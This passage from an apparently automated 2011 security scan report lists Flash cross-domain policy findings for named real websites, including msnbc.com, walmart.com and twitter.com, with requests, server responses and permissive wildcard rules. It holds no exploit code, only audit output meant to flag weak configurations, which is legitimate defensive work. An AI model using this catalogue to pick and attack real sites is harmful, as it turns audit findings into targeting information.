Date: Sun, 30 Jan 2011 01:52:17 GMT
Server: AOLserver/4.0.10
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 1511
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="*.moviefone.com" />
<allow-access-from domain="*.aolhealth.com" />
<allow-access-from domain="*.walletpop.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.lightningcast.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.fanhouse.com" />
<allow-access-from domain="*platformaprojects.com" />
...[SNIP]...

6.88. http://www.dooce.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Sun, 13 Feb 2011 01:52:34 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

6.89. http://www.habitablezone.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.habitablezone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.habitablezone.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 09 Nov 2009 03:13:40 GMT
ETag: "1881b-3d2-477e794890100"
Accept-Ranges: bytes
Content-Length: 978
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="localhost" to-ports="20-65535"/>
   <allow-access-from domain="*.local" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="192.168.0.*" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.robert-shepherd.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.robert-shepherd.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.habitablezone.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.habitablezone.net" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.robert-shepherd.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.robert-shepherd.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.habitablezone.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="*.dev.habitablezone.com" to-ports="20-65535"/>
...[SNIP]...
<allow-access-from domain="192.168.0.100" to-ports="20-65535"/>
...[SNIP]...

6.90. http://www.hoovers.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hoovers.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 00:59:01 GMT
ETag: "bf"
Accept-Ranges: bytes
Content-Length: 191
Vary: Accept-Encoding
Content-Type: text/xml
Set-Cookie: HID=173.193.214.243.1296352416699562; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerhaspriv-colo1=201052682.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
       <allow-access-from domain="*.brightcove.com" secure="false"/>
       <allow-access-from domain="*.hoovers.com" secure="false"/>
</cross-domain-policy>

6.91. http://www.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:07:03 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.92. https://www.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:07 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "3c057-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.93. http://www.polls.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.polls.newsvine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT
ETag: "a14031-191-492fdc72f7540"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 01:23:01 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.94. http://www.popularmechanics.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popularmechanics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popularmechanics.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=422
Date: Sun, 30 Jan 2011 03:18:22 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

6.95. http://www.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:18 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 30 Jan 2011 02:08:18 GMT
browser-expires: Sun, 30 Jan 2011 02:03:18 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 791
Vary: Accept-Encoding
Connection: close
Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.96. http://www.signonsandiego.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.signonsandiego.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.signonsandiego.com

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:20:09 GMT
ETag: "ffb94896b4e86f190cf7f815218e6848"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:19:09 GMT
Content-Type: text/xml
Server: Apache/2.2.10
Content-Length: 355
Date: Sun, 30 Jan 2011 03:19:09 GMT
X-Varnish: 1618713424
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.signonsandiego.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sosd" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.97. http://www.tigerdirect.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 794
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT
Accept-Ranges: bytes
ETag: "38d3bcb31951cb1:4f9"
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:24:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.compusa.com" />
<allow-access-from domain="*.compusa.pr" />
<allow-access-from domain="images.highspeedbackbone.net" />
...[SNIP]...
<allow-access-from domain="retail.tigerdirect.com" />
   <allow-access-from domain="www.tigerdirect.ca" />
<allow-access-from domain="retail.tigertirect.ca" />
   <allow-access-from domain="www.circuitcity.com" />
   <allow-access-from domain="com.puter.tv" />
   <allow-access-from domain="compusa.tv" />
   <allow-access-from domain="pinkfriday.org" />
   <allow-access-from domain="charitypcrace.com" />
...[SNIP]...

6.98. http://www.walmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "30db8-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Sun, 30 Jan 2011 04:03:54 GMT
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907970a45525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

6.99. http://www.zacks.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zacks.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:18 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
Last-Modified: Thu, 19 Nov 2009 20:44:21 GMT
ETag: "2a8585e-159-478bf6c7c1340"
Accept-Ranges: bytes
Content-Length: 345
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Sun, 30 Jan 2011 02:04:18 GMT
Pragma: no-cache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.zacks.com" />
<allow-access-from domain="zacks.com" />
<allow-access-from domain="zackselite.com" />
<allow-access-from domain="www.zackselite.com" />
...[SNIP]...

6.100. http://advertising.redacted/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.redacted

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:05:25 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.redacted" />
<allow-access-from domain="images.video.redacted" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

6.101. http://articles.redacted/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://articles.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: articles.moneycentral.msn.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sun, 30 Jan 2011 02:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA42
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "66a0b61d6a90cb1:ddd"
Last-Modified: Tue, 30 Nov 2010 08:39:34 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 573

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" secure="true"/>
<allow-access-from domain="redacted" secure="true"/>
<allow-access-from domain="blstc.redacted" secure="true"/>
<allow-access-from domain="stc.alphablu.msn-int.com" secure="true"/>
<allow-access-from domain="hs.interpolls.com" secure="true" />
<allow-access-from domain="i.interpolls.com" secure="true" />
...[SNIP]...

6.102. http://seedmagazine.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seedmagazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: seedmagazine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:02 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 10 Mar 2009 18:58:25 GMT
ETag: "2e80e1-d8-55f1f640"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s3.amazonaws.com" />
</cros
...[SNIP]...

6.103. https://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:03:08 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1296356588603269; path=/; expires=Sun, 06-Feb-11 03:03:08 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:37:05 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 30 Jan 2011 03:33:08 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.104. http://www.livescience.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livescience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livescience.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:40 GMT
Server: Apache
Last-Modified: Tue, 02 Dec 2008 19:13:20 GMT
ETag: "39d1169-38f-45d151ed7d400"
Accept-Ranges: bytes
Content-Length: 911
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

